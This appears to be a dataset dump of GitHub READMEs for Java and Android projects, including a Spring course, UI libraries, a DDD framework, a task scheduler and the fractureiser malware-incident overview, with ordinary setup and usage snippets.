- -### Introduction - -Spring Framework remains as popular today as it was when I first used it 12 years back. How is this possible in the incredibly dynamic world where architectures have completely changed? - -### What You will learn - -- You will learn the basics of Spring Framework - Dependency Injection, IOC Container, Application Context and Bean Factory. -- You will understand how to use Spring Annotations - @Autowired, @Component, @Service, @Repository, @Configuration, @Primary.... -- You will understand Spring MVC in depth - DispatcherServlet , Model, Controllers and ViewResolver -- You will use a variety of Spring Boot Starters - Spring Boot Starter Web, Starter Data Jpa, Starter Test -- You will learn the basics of Spring Boot, Spring AOP, Spring JDBC and JPA -- You will learn the basics of Eclipse, Maven, JUnit and Mockito -- You will develop a basic Web application step by step using JSP Servlets and Spring MVC -- You will learn to write unit tests with XML, Java Application Contexts and Mockito - -### Requirements -- You should have working knowledge of Java and Annotations. -- We will help you install Eclipse and get up and running with Maven and Tomcat. - - -### Step Wise Details -Refer each section - -## Installing Tools -- Installation Video : https://www.youtube.com/playlist?list=PLBBog2r6uMCSmMVTW_QmDLyASBvovyAO3 -- GIT Repository For Installation : https://github.com/in28minutes/getting-started-in-5-steps -- PDF : https://github.com/in28minutes/SpringIn28Minutes/blob/master/InstallationGuide-JavaEclipseAndMaven_v2.pdf - -## Running Examples -- Download the zip or clone the Git repository. 
-- Unzip the zip file (if you downloaded one) -- Open Command Prompt and Change directory (cd) to folder containing pom.xml -- Open Eclipse - - File -> Import -> Existing Maven Project -> Navigate to the folder where you unzipped the zip - - Select the right project -- Choose the Spring Boot Application file (search for @SpringBootApplication) -- Right Click on the file and Run as Java Application -- You are all Set -- For help : use our installation guide - https://www.youtube.com/playlist?list=PLBBog2r6uMCSmMVTW_QmDLyASBvovyAO3 - -### Troubleshooting -- Refer our TroubleShooting Guide - https://github.com/in28minutes/in28minutes-initiatives/tree/master/The-in28Minutes-TroubleshootingGuide-And-FAQ - -## Youtube Playlists - 500+ Videos - -[Click here - 30+ Playlists with 500+ Videos on Spring, Spring Boot, REST, Microservices and the Cloud](https://www.youtube.com/user/rithustutorials/playlists?view=1&sort=lad&flow=list) - -## Keep Learning in28Minutes - -in28Minutes is creating amazing solutions for you to learn Spring Boot, Full Stack and the Cloud - Docker, Kubernetes, AWS, React, Angular etc. - [Check out all our courses here](https://github.com/in28minutes/learn) - -![in28MinutesLearningRoadmap-July2019.png](https://github.com/in28minutes/in28Minutes-Course-Roadmap/raw/master/in28MinutesLearningRoadmap-July2019.png) -",0 -JeasonWong/Particle,It's a cool animation which can use in splash or somewhere else.,2016-08-29T09:21:15Z,,"## What's Particle ? -It's a cool animation which can use in splash or anywhere else. 
- -## Demo - -![Markdown](https://raw.githubusercontent.com/jeasonwong/Particle/master/screenshots/particle.gif) - -## Article -[手摸手教你用Canvas实现简单粒子动画](http://www.wangyuwei.me/2016/08/29/%E6%89%8B%E6%91%B8%E6%89%8B%E6%95%99%E4%BD%A0%E5%AE%9E%E7%8E%B0%E7%AE%80%E5%8D%95%E7%B2%92%E5%AD%90%E5%8A%A8%E7%94%BB/) - -## Attributes - -|name|format|description|中文解释 -|:---:|:---:|:---:|:---:| -| pv_host_text | string |set left host text|设置左边主文案 -| pv_host_text_size | dimension |set host text size|设置主文案的大小 -| pv_particle_text | string |set right particle text|设置右边粒子上的文案 -| pv_particle_text_size | dimension |set particle text size|设置粒子上文案的大小 -| pv_text_color | color |set host text color|设置左边主文案颜色 -|pv_background_color|color|set background color|设置背景颜色 -| pv_text_anim_time | integer |set particle text duration|设置粒子上文案的运动时间 -| pv_spread_anim_time | integer |set particle text spread duration|设置粒子上文案的伸展时间 -|pv_host_text_anim_time|integer|set host text displacement duration|设置左边主文案的位移时间 - -## Usage -#### Define your banner under your xml : - -```xml - -``` - -#### Start animation : - -```java -mParticleView.startAnim(); -``` - -#### Add animation listener to listen the end callback : - -```java -mParticleView.setOnParticleAnimListener(new ParticleView.ParticleAnimListener() { - @Override - public void onAnimationEnd() { - Toast.makeText(MainActivity.this, ""Animation is End"", Toast.LENGTH_SHORT).show(); - } -}); -``` - -## Import - -Step 1. Add it in your project's build.gradle at the end of repositories: - -```gradle -repositories { - maven { - url 'https://dl.bintray.com/wangyuwei/maven' - } -} -``` - -Step 2. 
Add the dependency: - -```gradle -dependencies { - compile 'me.wangyuwei:ParticleView:1.0.4' -} -``` - -### About Me - -[Weibo](http://weibo.com/WongYuwei) - -[Blog](http://www.wangyuwei.me) - -### QQ Group 欢迎讨论 - -**479729938** - -##**License** - -```license -Copyright [2016] [JeasonWong of copyright owner] - -Licensed under the Apache License, Version 2.0 (the ""License""); -you may not use this file except in compliance with the License. -You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - -Unless required by applicable law or agreed to in writing, software -distributed under the License is distributed on an ""AS IS"" BASIS, -WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -See the License for the specific language governing permissions and -limitations under the License. -```",0 -rubensousa/GravitySnapHelper,A SnapHelper that snaps a RecyclerView to an edge.,2016-08-31T07:25:23Z,,"# GravitySnapHelper - -A SnapHelper that snaps a RecyclerView to an edge. - -## Setup - -Add this to your build.gradle: - -```groovy -implementation 'com.github.rubensousa:gravitysnaphelper:2.2.2' -``` - -## How to use - -You can either create a GravitySnapHelper, or use GravitySnapRecyclerView. 
- -If you want to use GravitySnapHelper directly, -you just need to create it and attach it to your RecyclerView: - -```kotlin -val snapHelper = GravitySnapHelper(Gravity.START) -snapHelper.attachToRecyclerView(recyclerView) -``` - -If you want to use GravitySnapRecyclerView, you can use the following xml attributes for customisation: - -```xml - - - - - - -``` - -Example: - -```xml - -``` - -## Start snapping - -```kotlin -val snapHelper = GravitySnapHelper(Gravity.START) -snapHelper.attachToRecyclerView(recyclerView) -``` - - - -## Center snapping - -```kotlin -val snapHelper = GravitySnapHelper(Gravity.CENTER) -snapHelper.attachToRecyclerView(recyclerView) -``` - - - -## Limiting fling distance - -If you use **setMaxFlingSizeFraction** or **setMaxFlingDistance** -you can change the maximum fling distance allowed. - - - - -## With decoration - - - -## Features - -1. **setMaxFlingDistance** or **setMaxFlingSizeFraction** - changes the max fling distance allowed. -2. **setScrollMsPerInch** - changes the scroll speed. -3. **setGravity** - changes the gravity of the SnapHelper. -4. **setSnapToPadding** - enables snapping to padding (default is false) -5. **smoothScrollToPosition** and **scrollToPosition** -6. RTL support out of the box - -## Nested RecyclerViews - -Take a look at these blog posts if you're using nested RecyclerViews - -1. [Improving scrolling behavior of nested RecyclerViews](https://rubensousa.com/2019/08/16/nested_recyclerview_part1/) - -2. [Saving scroll state of nested RecyclerViews](https://rubensousa.com/2019/08/27/saving_scroll_state_of_nested_recyclerviews/) - - -## License - - Copyright 2018 The Android Open Source Project - Copyright 2019 Rúben Sousa - - Licensed under the Apache License, Version 2.0 (the ""License""); - you may not use this file except in compliance with the License. 
- You may obtain a copy of the License at - - http://www.apache.org/licenses/LICENSE-2.0 - - Unless required by applicable law or agreed to in writing, software - distributed under the License is distributed on an ""AS IS"" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - See the License for the specific language governing permissions and - limitations under the License. -",0 -xujeff/tianti,java轻量级的CMS解决方案-天梯。天梯是一个用java相关技术搭建的后台CMS解决方案,用户可以结合自身业务进行相应扩展,同时提供了针对dao、service等的代码生成工具。技术选型:Spring Data JPA、Hibernate、Shiro、 Spring MVC、Layer、Mysql等。,2017-02-08T08:21:02Z,,"# 天梯(tianti) - [天梯](https://yuedu.baidu.com/ebook/7a5efa31fbd6195f312b3169a45177232f60e487)[tianti-tool](https://github.com/xujeff/tianti-tool)简介:
- - 1、天梯是一款使用Java编写的免费的轻量级CMS系统,目前提供了从后台管理到前端展现的整体解决方案。 - 2、用户可以不编写一句代码,就制作出一个默认风格的CMS站点。 - 3、前端页面自适应,支持PC和H5端,采用前后端分离的机制实现。后端支持天梯蓝和天梯红换肤功能。 - 4、项目技术分层明显,用户可以根据自己的业务模块进行相应地扩展,很方便二次开发。 - -  ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/tiantiframework.png)
-  ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/help/help.png)
- - 技术架构:
- - 1、技术选型: - 后端 - ·核心框架:Spring Framework 4.2.5.RELEASE - ·安全框架:Apache Shiro 1.3.2 - ·视图框架:Spring MVC 4.2.5.RELEASE - ·数据库连接池:Tomcat JDBC - ·缓存框架:Ehcache - ·ORM框架:Spring Data JPA、hibernate 4.3.5.Final - ·日志管理:SLF4J 1.7.21、Log4j - ·编辑器:ueditor - ·工具类:Apache Commons、Jackson 2.8.5、POI 3.15 - ·view层:JSP - ·数据库:mysql、oracle等关系型数据库 - - 前端 - ·dom : Jquery - ·分页 : jquery.pagination - ·UI管理 : common - ·UI集成 : uiExtend - ·滚动条 : jquery.nicescroll.min.js - ·图表 : highcharts - ·3D图表 :highcharts-more - ·轮播图 : jquery-swipe - ·表单提交 :jquery.form - ·文件上传 :jquery.uploadify - ·表单验证 :jquery.validator - ·展现树 :jquery.ztree - ·html模版引擎 :template - 2、项目结构: - 2.1、tianti-common:系统基础服务抽象,包括entity、dao和service的基础抽象; - 2.2、tianti-org:用户权限模块服务实现; - 2.3、tianti-cms:资讯类模块服务实现; - 2.4、tianti-module-admin:天梯后台web项目实现; - 2.5、tianti-module-interface:天梯接口项目实现; - 2.6、tianti-module-gateway:天梯前端自适应项目实现(是一个静态项目,调用tianti-module-interface获取数据); -   - -  前端项目概览:
- PC:
- ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/index.png)   - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/columnlist.png)   - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/detail.png)   - H5:
- ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/h5/index.png)   - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/h5/columnlist.png)   - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/gateway/h5/detail.png)   -
- 后台项目概览:
- 天梯登陆页面: - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/login.png)   - 天梯蓝风格(默认): - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/userlist.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/rolelist.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/menulist.png)                           - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/roleset.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/updatePwd.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/skin.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/lanmulist.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/addlanmu.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/articlelist.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/addarticle.png) - 天梯红风格: - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/userlist.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/rolelist.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/menulist.png)                           - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/roleSet.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/updatePwd.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/skin.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/lanmulist.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/addlanmu.png) - ![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/articlelist.png) - 
![image](https://raw.githubusercontent.com/xujeff/tianti/master/screenshots/red/addarticle.png) - - -",0 -funkygao/cp-ddd-framework,轻量级DDD正向/逆向业务建模框架,支撑复杂业务系统的架构演化!,2020-09-07T14:03:55Z,,"

DDDplus

- -
- -A lightweight DDD(Domain Driven Design) enhancement framework for forward/reverse business modeling, supporting complex system architecture evolution! - -[![CI](https://github.com/funkygao/cp-ddd-framework/workflows/CI/badge.svg?branch=master)](https://github.com/funkygao/cp-ddd-framework/actions?query=branch%3Amaster+workflow%3ACI) -[![Javadoc](https://img.shields.io/badge/javadoc-Reference-blue.svg)](https://funkygao.github.io/cp-ddd-framework/doc/apidocs/) -[![Maven Central](https://img.shields.io/maven-central/v/io.github.dddplus/dddplus.svg?label=Maven%20Central)](https://central.sonatype.com/namespace/io.github.dddplus) -![Requirement](https://img.shields.io/badge/JDK-8+-blue.svg) -[![Coverage Status](https://img.shields.io/codecov/c/github/funkygao/cp-ddd-framework.svg)](https://codecov.io/gh/funkygao/cp-ddd-framework) -[![Mentioned in Awesome DDD](https://awesome.re/mentioned-badge.svg)](https://github.com/heynickc/awesome-ddd#jvm) -[![Gitter chat](https://img.shields.io/badge/gitter-join%20chat%20%E2%86%92-brightgreen.svg)](https://gitter.im/cp-ddd-framework/community) - -
- -
- -Languages: English | [中文](README.zh-cn.md) -
- ----- - -## What is DDDplus? - -DDDplus, formerly named cp-ddd-framework(cp means Central Platform:中台), is a lightweight DDD(Domain Driven Design) enhancement framework for forward/reverse business modeling, supporting complex system architecture evolution! - ->It captures DDD missing concepts and patches the building block. It empowers building domain model with forward and reverse modeling. It visualizes the complete domain knowledge from code. It connects frontline developers with (architect, product manager, business stakeholder, management team). It makes (analysis, design, design review, implementation, code review, test) a positive feedback closed-loop. It strengthens building extension oriented flexible software solution. It eliminates frequently encountered misunderstanding of DDD via thorough javadoc for each building block with detailed example. - -In short, the 3 most essential `plus` are: -1. [patch](/dddplus-spec/src/main/java/io/github/dddplus/model) DDD building blocks for pragmatic forward modeling, clearing obstacles of DDD implementation -2. offer a reverse modeling [DSL](/dddplus-spec/src/main/java/io/github/dddplus/dsl), visualizing complete domain knowledge from code -3. provide [extension point](/dddplus-spec/src/main/java/io/github/dddplus/ext) with multiple routing mechanism, suited for complex business scenarios - -## Current status - -Used for several complex critical central platform projects in production environment. 
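The extension point with routing mentioned above can be pictured with a minimal, self-contained sketch. Everything below (the `PricingExt` interface, `ExtensionRouter`, the business codes) is invented for illustration — it is the general pattern, not the real DDDplus API:

```java
import java.util.HashMap;
import java.util.Map;

// Hypothetical sketch of an "extension point with routing" — the names
// below are invented for illustration and are NOT the DDDplus API.
public class ExtensionDemo {
    // An extension point: one business behavior with several variants.
    interface PricingExt {
        int quote(int basePrice);
    }

    // Routes a request to the variant registered for a business identity,
    // falling back to the default behavior when no variant matches.
    static class ExtensionRouter {
        private final Map<String, PricingExt> variants = new HashMap<>();

        void register(String businessCode, PricingExt ext) {
            variants.put(businessCode, ext);
        }

        PricingExt route(String businessCode) {
            return variants.getOrDefault(businessCode, base -> base);
        }
    }

    public static void main(String[] args) {
        ExtensionRouter router = new ExtensionRouter();
        router.register("vip", base -> base * 90 / 100); // VIP pays 90%
        System.out.println(router.route("vip").quote(100));     // 90
        System.out.println(router.route("default").quote(100)); // 100
    }
}
```

The point of the pattern is that complex business scenarios plug in variants without touching the routing core.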
- -## Showcase - -[A full demo of DDDplus forward/reverse modeling ->](dddplus-test/src/test/java/ddd/plus/showcase/README.md) - -## Quickstart - -### Forward modeling - -```xml - - io.github.dddplus - dddplus-runtime - -``` - -#### Integration with SpringBoot - -```java -@SpringBootApplication(scanBasePackages = {""${your base packages}"", ""io.github.dddplus""}) -public class Application { - public static void main(String[] args) { - SpringApplication.run(Application.class); - } -} -``` - -### Reverse Modeling - -Please check out the [《step by step guide》](doc/ReverseModelingGuide.md). - -```xml - - io.github.dddplus - dddplus-spec - -``` - -Annotate your code With [DSL](/dddplus-spec/src/main/java/io/github/dddplus/dsl), DDDplus will parse AST and render domain model in multiple views. - -```bash -mvn io.github.dddplus:dddplus-maven-plugin:model \ - -DrootDir=${colon separated source code dirs} \ - -DplantUml=${target business model in svg format} \ - -DtextModel=${target business model in txt format} -``` - -### Architecture Guard - -```bash -mvn io.github.dddplus:dddplus-maven-plugin:enforce \ - -DrootPackage={your pkg} \ - -DrootDir={your src dir} -``` - -## Known Issues - -- reverse modeling assumes unique class names within a code repo - -## Contribution - -You are welcome to contribute to the project with pull requests on GitHub. - -If you find a bug or want to request a feature, please use the [Issue Tracker](https://github.com/funkygao/cp-ddd-framework/issues). - -For any question, you can use [Gitter Chat](https://gitter.im/cp-ddd-framework/community) to ask. - -## Licensing - -DDDplus is licensed under the Apache License, Version 2.0 (the ""License""); you may not use this project except in compliance with the License. You may obtain a copy of the License at [http://www.apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0). 
-",0 -fractureiser-investigation/fractureiser,Information about the fractureiser malware,2023-06-07T15:59:56Z,,"

- -

- -**Translations to other languages:** - -*These were made at varying times in this document's history and **may be outdated** — especially the current status in README.md.* - -* [简体中文版本见此](./lang/zh-CN/) -* [Polska wersja](./lang/pl-PL/) -* [Читать на русском языке](./lang/ru-RU/) -* [한국어는 이곳으로](./lang/ko-KR/) -* Many others that are unfinished can be found in [Pull Requests](https://github.com/fractureiser-investigation/fractureiser/pulls) - -## What? -`fractureiser` is a [virus](https://en.wikipedia.org/wiki/Computer_virus) found in several Minecraft projects uploaded to CurseForge and BukkitDev. The malware is embedded in multiple mods, some of which were added to highly popular modpacks. The malware is only known to target Windows and Linux. - -If left unchecked, fractureiser can be **INCREDIBLY DANGEROUS** to your machine. Please read through this document for the info you need to keep yourself safe. - -We've dubbed this malware fractureiser because that's the name of the CurseForge account that uploaded the most notable malicious files. - -## Current Investigation Status -The fractureiser event has ended — no follow-up Stage0s were ever discovered and no further evidence of activity has been discovered in the past 3 months. -A third C&C was never stood up to our knowledge. - -A copycat malware is still possible — and likely inevitable — but *fractureiser* is dead. **Systems that are already infected are still cause for concern**, and the below user documentation is still relevant. - -## Follow-Up Meeting -On 2023-06-08 the fractureiser Mitigation Team held a meeting with notable members of the community to discuss preventive measures and solutions for future problems of this scale. -See [this page](https://github.com/fractureiser-investigation/fractureiser/blob/main/docs/2023-06-08-meeting.md) for the agenda and minutes of the event. 
- -## BlanketCon Panel -emilyploszaj and jaskarth, core members of the team, held a panel at BlanketCon 23 about the fractureiser mitigation effort. You can find a [recording of the panel by quat on YouTube](https://youtu.be/9eBmqHAk9HI). - -## What YOU need to know - -### [Modded Players CLICK HERE](docs/users.md) - -If you're simply a mod player and not a developer, the above link is all you need. It contains surface level information of the malware's effects, steps to check if you have it and how to remove it, and an FAQ. - -Anyone who wishes to dig deeper may also look at -* [Event Timeline](docs/timeline.md) -* [Technical Breakdown](docs/tech.md) - -### I have never used any Minecraft mods -You are not infected. - -## Additional Info - -We've stopped receiving new unique samples, so the sample submission inbox is closed. If you would like to get in contact with the team, please shoot an email to `fractureiser@unascribed.com`. - -If you copy portions of this document elsewhere, *please* put a prominent link back to this [GitHub Repository](https://github.com/fractureiser-investigation/fractureiser) somewhere near the top so that people can read the latest updates and get in contact. - -The **only** official public channel that this team ever used for coordination was #cfmalware on EsperNet. ***We have no affiliation with any Discord guilds.*** - -**Do not ask for samples.** If you have experience and credentials, that's great, but we have no way to verify this without using up tons of our team's limited time. Sharing malware samples is dangerous, even among people who know what they're doing. - ---- - -\- the [fractureiser Mitigation Team](docs/credits.md) -",0 -siaorg/sia-task,微服务任务调度框架,2019-05-15T03:23:47Z,,"## 关于我们 - -* 邮件交流:sia.list@creditease.cn - -* 提交issue: - -* 微信交流: - - - - -微服务任务调度平台 -=== -[使用指南](USERSGUIDE.md)
-[Development Guide](DEVELOPGUIDE.md)<br>
-[Deployment Guide](DEPLOY.md)<br>
-[Demo](FASTSTART.md)<br>
- -背景 ---- - -无论是互联网应用或者企业级应用,都充斥着大量的批处理任务。我们常常需要一些任务调度系统帮助我们解决问题。随着微服务化架构的逐步演进,单体架构逐渐演变为分布式、微服务架构。在此的背景下,很多原先的任务调度平台已经不能满足业务系统的需求。于是出现了一些基于分布式的任务调度平台。这些平台各有其特点,但各有不足之处,比如不支持任务编排、与业务高耦合、不支持跨平台等问题。不是非常符合公司的需求,因此我们开发了微服务任务调度平台(SIA-TASK)。 - -SIA��我们公司基础开发平台Simple is Awesome的简称,SIA-TASK(微服务任务调度平台)是其中的一项重要产品,SIA-TASK契合当前微服务架构模式,具有跨平台,可编排,高可用,无侵入,一致性,异步并行,动态扩展,实时监控等特点。 - -Introduction ---- - -A lot of batch tasks need to be processed by task scheduling systems. The single architectures are evolving towards distributed ones. We often need distributed task scheduling platforms to handle the needs of business systems. But such platforms may not support task scheduling across OS or are coupled with business features. We therefore decided to develop SIA-TASK. - -SIA (Simple is Awesome) is our basic development platform. SIA-TASK is one of the key products of SIA and can work across OS. Its features include task scheduling, high availability, non-invasiveness, consistency, asynchronous concurrent processing, dynamic scale-out and real-time monitoring, etc. - - -项目简介 ---- - -SIA-TASK是任务调度的一体式解决方案。对任务进行元数据采集,然后进行任务可视化编排,最终进行任务调度,并且对任务采取全流程监控,简单易用。对业务完全无侵入,通过简单灵活的配置即可生成符合预期的任务调度模型。 - -SIA-TASK借鉴微服务的设计思想,获取分布在每个任务执行器上的任务元数据,上传到任务注册中心。利用在线方式进行任务编排,可动态修改任务时钟,采用HTTP作为任务调度协议,统一使用JSON数据格式,由调度中心进行时钟解析,执行任务流程,进行任务通知。 - -Overview ---- - -SIA-TASK is an integrated non-invasive task scheduling solution. It collects task metadata and then visualizes and schedules the tasks. The scheduled tasks are monitored throughout the whole process. An ideal task scheduling model can be generated after simple and flexible configuration. - -SIA-TASK collects task metadata on all executers and upload the data to the registry. The tasks are scheduled online using JSON with HTTP as the protocol. The scheduling center parses the clock, executes tasks and sends task notifications. 
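Since tasks are invoked over HTTP with a uniform JSON format, the metadata a task uploads to the registry can be pictured roughly as follows. This is an illustrative example only — the field names and values are invented, not the actual SIA-TASK wire format:

```json
{
  "taskKey": "order-service:refundTask",
  "ip": "10.0.0.12",
  "port": 8080,
  "path": "/task/refund",
  "method": "POST",
  "paramFormat": "json"
}
```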
- - - -关键术语 ---- - -* 任务(Task): 基本执行单元,执行器对外暴露的一个HTTP调用接口; -* 作业(Job): 由一个或者多个存在相互逻辑关系(串行/并行)的任务组成,任务调度中心调度的最小单位; -* 计划(Plan): 由若干个顺序执行的作业组成,每个作业都有自己的执行周期,计划没有执行周期; -* 任务调度中心(Scheduler): 根据每个的作业的执行周期进行调度,即按照计划、作业、任务的逻辑进行HTTP请求; -* 任务编排中心(Config): 编排中心使用任务来创建计划和作业; -* 任务执行器(Executer): 接收HTTP请求进行业务逻辑的执行; -* Hunter:Spring项目扩展包,负责执行器中的任务抓取,上传注册中心,业务可依赖该组件进行Task编写。 - - -Terms ---- - -* Task: the basic execution unit and the HTTP call interface -* Job: the minimum scheduled unit that is composed of one or more (serial/concurrent) tasks -* Plan: the composition of several serial jobs with no execution cycle -* Scheduler: sends HTTP requests based on the logic of the plans, jobs and tasks -* Config: creates plans and jobs with tasks -* Executer: receives HTTP requests and executes the business logic -* Hunter: fetches tasks, uploads metadata and scripts business tasks - - -微服务任务调度平台的特性 ---- - -* 基于注解自动抓取任务,在暴露成HTTP服务的方法上加入@OnlineTask注解,@OnlineTask会自动抓取方法所在的IP地址,端口,请求路径,请求方法,请求参数格式等信息上传到任务注册中心(zookeeper),并同步写入持久化存储中,此方法即任务; -* 基于注解无侵入多线程控制,单一任务实例必须保持单线程运行,任务调度框架自动拦截@OnlineTask注解进行单线程运行控制,保持在一个任务运行时不会被再次调度。而且整个控制过程对开发者完全无感知。 -* 调度器自适应任务分配,任务执行过程中出现失败,异常时。可以根据任务定制的策略进行多点重新唤醒任务,保证任务的不间断执行。 -* 高度灵活任务编排模式,SIA-TASK的设计思想是以任务为原子,把多个任务按照执行的关系组合起来形成一个作业。同时运行时分为任务调度中心和任务编排中心,使得作业的调度和作业的编排分隔开来,互不影响。在我们需要调整作业的流程时,只需要在编排中心进行处理即可。同时编排中心支持任务按照串行,并行,分支等方式组织关系。在相同任务不同任务实例时,也支持多种调度方式进行处理。 - -Features ---- - -* Annotation-based automatic task fetching. Add @OnlineTask to the HTTP method. @OnlineTask would fetch and upload the IP address, port, request path, and request parameter format to the registry (Zookeeper) while writing the information into the persistent storage. -* Annotation-based non-invasive multi-threading control. The scheduler automatically intercepts @OnlineTask for single-threading control and ensures that the running task would not be scheduled again. The whole process is non-invasive. -* Self-adaptive task scheduling. 
Tasks can be woken up based on the custom strategies when execution failure happens. -* Flexible task configuration. SIA-TASK is designed to group several logically related tasks into a job. The Scheduler and the Config schedules and configures jobs independently. The Config allows tasks to be organized in series, concurrently or as branches. Instances of the same task can be scheduled differently. - - - - -微服务任务调度平台设计 ---- - -SIA-TASK主要分为五个部分: - -* 任务执行器 -* 任务调度中心 -* 任务编排中心 -* 任务注册中心(zookeeper) -* 持久存储(Mysql) - -SIA-TASK includes the following components: - -* Executer -* Scheduler -* Config -* Registry (Zookeeper) -* Persistent storage (MySQL) - -![逻辑架构图](docs/images/sia_task1.png) - - -SIA-TASK的主要运行逻辑: - -1. 通过注解抓取任务执行器中的任务上报到任务注册中心 -2. 任务编排中心从任务注册中心获取数据进行编排保存入持久化存储 -3. 任务调度中心从持久化存储获取调度信息 -4. 任务调度中心按照调度逻辑访问任务执行器 - -SIA-TASK的主要运行逻辑: - -1. Fetch and upload annotated tasks to the registry -2. The Config obtains data from the registry for scheduling and persistent storage -3. The Scheduler acquires data from the persistent storage -4. The Scheduler accesses the task scheduler following the scheduling logic - - -![逻辑架构图](docs/images/sia_task2.png) - - -UI预览 ---- - -首页提供多维度监控 - -* 调度器信息:展示调度器信息(负载能力,预警值),以及作业分布情况。 -* 调度信息:展示调度中心触发的调度次数,作业、任务多维度调度统计。 -* 对接项目统计:对使用项目的系统进行统计,作业个数,任务个数等等。 - -Homepage - -* Scheduler: loading capacity, alarm value and job distribution -* Scheduling: scheduling frequency, job metrics and task metrics -* Active users: job count and task count of active users - -![首页](docs/images/index.png) - -
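The non-invasive single-threading control described in the features above — a task instance is never scheduled again while a previous run is still in progress — can be sketched in plain Java. This is an illustrative sketch of the idea only, not the actual @OnlineTask interceptor:

```java
import java.util.concurrent.atomic.AtomicBoolean;
import java.util.function.Supplier;

// Illustrative sketch only — NOT the real @OnlineTask interceptor.
// Shows how an interceptor can guarantee that a task instance is never
// executed concurrently: a second invocation is rejected, not queued.
public class SingleRunGuard {
    private final AtomicBoolean running = new AtomicBoolean(false);

    /** Runs the task, or returns null when a run is already in progress. */
    public <T> T invoke(Supplier<T> task) {
        if (!running.compareAndSet(false, true)) {
            return null; // reject: a previous run of this task is still active
        }
        try {
            return task.get();
        } finally {
            running.set(false); // allow the next scheduled run
        }
    }

    public static void main(String[] args) {
        SingleRunGuard guard = new SingleRunGuard();
        System.out.println(guard.invoke(() -> "done")); // done
    }
}
```

The compare-and-set keeps the check and the lock acquisition atomic, so the guard stays correct even when the scheduler fires from multiple threads.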
-调度监控提供对已提交的作业进行实时监控展示
-
-* 作业状态实时监控:以项目组为单位面板,展示作业运行时状态。
-* 实时日志关联:可以通过涂色状态图标进行日志实时关联展示。
-
-Scheduling Monitor: real-time monitoring over submitted jobs
-
-* Real-time job monitoring: runtime metrics of jobs by project group
-* Real-time log correlation: logs are linked and displayed in real time via the colored status icons
-
-
-![调度监控](docs/images/scheduling-monitoring.png)
-
-<br>
-任务管理:提供任务元数据的相关操作 - -* 任务元数据录入:手动模式的任务,可在此进行录入。 -* 任务连通性测试:提供任务连通性功能测试。 -* 任务元数据其他操作:修改,删除。 - -Task Manager: task metadata operation - -* Metadata entry: enter the metadata of manual tasks -* Connectivity test: test the connectivity of tasks -* Modification and deletion - - -![Task管理](docs/images/Task-management.png) -![Task管理](docs/images/user-handbook_taskMg5.png) - - -
-Job管理:提供作业相关操作 - -* 任务编排:进行作业的编排。 -* 发布作业: 作业的创建,修改,以及发布。 -* 级联设置:提供存在时间依赖的作业设置。 - -Job Manager: job operations - -* Task configuration: configure jobs -* Job release: create, modify and release jobs -* Cascading setting: set time-dependent jobs - - -![Job管理](docs/images/Job-management.png) - -
-日志管理 - -Log Manager - -![Job管理](docs/images/user-handbook_log1.png) - - -开源地址 ---- - -* [https://github.com/siaorg/sia-task](https://github.com/siaorg/sia-task) - -## 其他说明 - -### 关于编译代码 -* 建议使用Jdk1.8以上,JDK 1.8 or later version is recommended. - -### 版本说明 -* 建议版本1.0.0,SIA-TASK 1.0.0 is recommended. - -### 版权说明 -* 自身使用 Apache v2.0 协议,SIA-TASK uses Apache 2.0. - -### 其他相关资料 - -## SIA相关开源产品链接: - -+ [微服务路由网关](https://github.com/siaorg/sia-gateway) - -+ [Rabbitmq队列服务PLUS](https://github.com/siaorg/sia-rabbitmq-plus) - - -(待补充) - - - -",0 -heysupratim/material-daterange-picker,A material Date Range Picker based on wdullaers MaterialDateTimePicker,2015-09-14T12:00:47Z,,"[![Android Arsenal](https://img.shields.io/badge/Android%20Arsenal-MaterialDateRangePicker-brightgreen.svg?style=flat)](http://android-arsenal.com/details/1/2501) - -[ ![Download](https://api.bintray.com/packages/borax12/maven/material-datetime-rangepicker/images/download.svg) ](https://bintray.com/borax12/maven/material-datetime-rangepicker/_latestVersion) - -[![Maven Central](https://maven-badges.herokuapp.com/maven-central/com.borax12.materialdaterangepicker/library/badge.svg)](https://maven-badges.herokuapp.com/maven-central/com.borax12.materialdaterangepicker/library) - - -Material Date and Time Picker with Range Selection -====================================================== - - -Credits to the original amazing material date picker library by wdullaer - https://github.com/wdullaer/MaterialDateTimePicker - -## Adding to your project - -Add the jcenter repository information in your build.gradle file like this -```java - -repositories { - jcenter() -} - - -dependencies { - implementation 